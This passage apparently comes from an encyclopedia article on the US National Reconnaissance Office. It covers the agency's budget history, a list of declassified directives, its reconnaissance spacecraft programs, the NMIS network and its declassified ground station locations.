NRO derives its funding both from the US intelligence budget and the military budget. In 1971, the annual budget was estimated to be around $1 billion (inflation adjusted US$ 7.5 billion in 2024).^[16] A 1975 report by Congress's Commission on the Organization of the Government for the Conduct of Foreign Policy states that the NRO had "the largest budget of any intelligence agency".^[18] By 1994, the annual budget had risen to $6 billion (inflation adjusted US$ 12.3 billion in 2024),^[38] and for 2010 it is estimated to amount to $15 billion (inflation adjusted US$ 21 billion in 2024).^[39] This would correspond to 19% of the overall US intelligence budget of $80 billion for FY2010.^[40] For Fiscal Year 2012 the budget request for science and technology included an increase to almost 6% (about US$600 million) of the NRO budget after it had dropped to just about 3% of the overall budget in the years before.^[37]

NRO directives and instructions

Under the Freedom of Information Act the NRO declassified a list of their secret directives for internal use. The following is a list of the released directives, which are available for download:

NROD 10-2 – "National Reconnaissance Office External Management Policy"
NROD 10-4 – "National Reconnaissance Office Sensitive Activities Management Group"
NROD 10-5 – "Office of Corporate System Engineer Charter"
NROD 22-1 – "Office of Inspector General"
NROD 22-2 – "Employee Reports of Urgent Concerns to Congress"
NROD 22-3 – "Obligations to report evidence of Possible Violations of Federal Criminal Law and Illegal Intelligence Activities"
NROD 50-1 – "Executive Order 12333 – Intelligence Activities Affecting United States Persons"
NROD 61-1 – "NRO Internet Policy, Information Technology"
NROD 82-1a – "NRO Space Launch Management"
NROD 110-2 – "National Reconnaissance Office Records and Information Management Program"
NROD 120-1 – The NRO Military Uniform Wear Policy
NROD 120-2 – "The NRO Awards and Recognition Programs"
NROD 120-3 – "Executive Secretarial Panel"
NROD 120-4 – "National Reconnaissance Pioneer Recognition Program"
NROD 120-5 – "National Reconnaissance Office Utilization of the Intergovernmental Personnel Act Mobility Program"
NROD 121-1 – "Training of NRO Personnel"
NROI 150-4 – "Prohibited Items in NRO Headquarters Buildings/Property"

"Strategic War Gaming Division"

According to a pamphlet advertising a security conference in 2002, the NRO has a "Strategic Wargaming Division", then headed by John Fulton, who was "on staff for the CIA".^[41]

Technology

NRO's technology is likely more advanced than its civilian equivalents. In the 1980s the NRO had satellites and software that were capable of determining the exact dimensions of a tank gun.^[18] In 2012 the agency donated two space telescopes to NASA. Despite being stored unused, the instruments are superior to the Hubble Space Telescope. One journalist observed, "If telescopes of this caliber are languishing on shelves, imagine what they're actually using."^[42]

Spacecraft

The NRO spacecraft include:^[43]

GEOINT imaging

Keyhole series – Imagery intelligence:
- KH-1, KH-2, KH-3, KH-4, KH-4A, KH-4B Corona (1959–1972)
- KH-5 – Argon (1961–1962)
- KH-6— Lanyard (1963)
- KH-7 – Gambit (1963–1967)^[44]
- KH-8 – Gambit (1966–1984)
- KH-9 – Hexagon and Big Bird (1971–1986)
- KH-10 – Dorian (cancelled)
- KH-11 – Kennan (or Kennen), Crystal, Improved Crystal, Ikon, and Evolved Enhanced CRYSTAL System (1976–2013)
Samos – photo imaging (1960–1962)
Misty/Zirconic – stealth IMINT
- Enhanced Imaging System
Next Generation Electo-Optical (NGEO), modular system, designed for incremental improvements (in development).^[45]

GEOINT radar

Lacrosse/Onyx – radar imaging (1988–)
TOPAZ (1–5) and TOPAZ Block 2^[43]

SIGINT

Samos-F – SIGINT (1962–1971)
Poppy – ELINT program (1962–1971) continuing Naval Research Laboratory's GRAB (1960–1961)
Jumpseat (1971–1983) and Trumpet (1994–2008) SIGINT
Canyon (1968–1977), Vortex/Chalet (1978–1989) and Mercury (1994–1998) – SIGINT including COMINT
Rhyolite/Aquacade (1970–1978), Magnum/Orion (1985–1990), and Mentor (1995–2010) – SIGINT
NEMESIS (High Altitude)^[43]
ORION (High Altitude)^[43]
RAVEN (High Altitude)^[43]
INTRUDER (Low Altitude)^[43]
SIGINT High Altitude Replenishment Program (SHARP)

Space communications

Quasar, communications relay^[43]
NROL-1 through NROL-66 – various secret satellites. NROL stands for National Reconnaissance Office Launch.

This list is likely to be incomplete, given the classified nature of many NRO spacecraft.

NMIS network

The NRO Management Information System (NMIS) is a computer network used to distribute NRO data classified as Top Secret. It is also known as the Government Wide Area Network (GWAN).^[46]

Locations

In October 2008, NRO declassified five mission ground stations: three in the United States, near Washington, D.C.; Aurora, Colorado; and Las Cruces, New Mexico, and a presence at RAF Menwith Hill, UK, and at the Joint Defence Facility Pine Gap, Australia.